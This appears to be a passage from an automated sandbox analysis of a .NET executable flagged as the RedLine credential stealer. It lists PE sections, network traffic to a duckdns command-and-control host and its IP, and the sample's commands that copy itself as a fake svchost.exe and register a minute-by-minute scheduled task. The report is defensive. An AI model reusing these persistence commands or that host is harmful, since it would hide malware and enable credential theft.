                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x2504c0x25200False0.8109743265993266data7.585773646811085IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x280000x2faa40x2fc00False0.08600908049738219data2.4474216242910125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x580000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x280b40x13caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x294a20x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584
                                                          RT_ICON0x39cee0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016
                                                          RT_ICON0x431ba0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560
                                                          RT_ICON0x499c60x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600
                                                          RT_ICON0x4ee720x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896
                                                          RT_ICON0x530be0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600
                                                          RT_ICON0x5568a0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224
                                                          RT_ICON0x567560x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400
                                                          RT_ICON0x571020x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088
                                                          RT_GROUP_ICON0x575b80x92data
                                                          RT_VERSION0x576860x1f8dataEnglishUnited States
                                                          RT_MANIFEST0x578ba0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 30, 2022 00:07:25.722348928 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:25.752378941 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:25.752796888 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:26.016802073 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:26.088752985 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:26.213782072 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:26.218960047 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:26.290599108 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:26.380656004 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:26.424237013 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:34.937004089 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:34.972991943 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:35.004894972 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:35.055725098 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:35.055794954 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:35.055846930 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:35.055901051 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:07:35.056029081 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:07:35.056374073 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:07.861217022 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:07.890326023 CET465394968585.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:07.890465021 CET4968546539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.012422085 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.040680885 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.040882111 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.051173925 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.118521929 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.179694891 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.181700945 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.210653067 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.212898016 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.242925882 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.243597984 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.243987083 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.272692919 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.272722960 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.273192883 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.273495913 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.273772001 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.274296045 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.300961971 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.301352024 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.301760912 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.301800013 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.302026987 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.302115917 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.302129030 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.302516937 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.302608967 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.302635908 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.302661896 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.302783012 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.304261923 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.329659939 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.329730988 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.329937935 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.330197096 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.330393076 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.330487013 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.331543922 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.331660986 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.331897974 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.332432032 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.332724094 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.333273888 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.333509922 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.333692074 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.333694935 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.333961010 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.334039927 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.334115982 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.335695982 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.335901022 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.357816935 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.358990908 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359028101 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359174967 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359221935 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359349966 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359509945 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.359599113 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359643936 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.359833002 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.360557079 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.361654997 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.361905098 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.362641096 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.362689018 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.362763882 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.363637924 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.364617109 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365525007 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365761995 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365890026 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365921021 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365948915 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.365995884 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.366144896 CET4968746539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:08.366528034 CET465394968785.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:08.367007971 CET465394968785.208.136.178192.168.2.3

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 30, 2022 00:07:25.575783014 CET6372253192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:07:25.687061071 CET53637228.8.8.8192.168.2.3
                                                          Nov 30, 2022 00:07:35.732409954 CET6552253192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:07:35.763092995 CET5986953192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:07.898642063 CET5439753192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:08.008116007 CET53543978.8.8.8192.168.2.3
                                                          Nov 30, 2022 00:08:10.978208065 CET5932453192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:11.086960077 CET53593248.8.8.8192.168.2.3

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 30, 2022 00:07:25.575783014 CET192.168.2.38.8.8.80x9fd4Standard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.732409954 CET192.168.2.38.8.8.80x7e82Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.763092995 CET192.168.2.38.8.8.80x48a3Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:07.898642063 CET192.168.2.38.8.8.80xe5feStandard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:10.978208065 CET192.168.2.38.8.8.80x3609Standard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 30, 2022 00:07:25.687061071 CET8.8.8.8192.168.2.30x9fd4No error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.754019976 CET8.8.8.8192.168.2.30x7e82No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.783816099 CET8.8.8.8192.168.2.30x48a3No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Nov 30, 2022 00:08:08.008116007 CET8.8.8.8192.168.2.30xe5feNo error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:11.086960077 CET8.8.8.8192.168.2.30x3609No error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • saleshor12.duckdns.org:46539

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:00:06:58
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0x590000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low

                                                          General

                                                          Target ID:1
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0xd20000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Target ID:2
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:3
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\svchost
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:4
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:5
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:6
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:7
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c copy "C:\Users\user\Desktop\workalone.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                          Imagebase:0xb0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:8
                                                          Start time:00:07:07
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                                                          Imagebase:0x960000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:9
                                                          Start time:00:07:08
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          No disassembly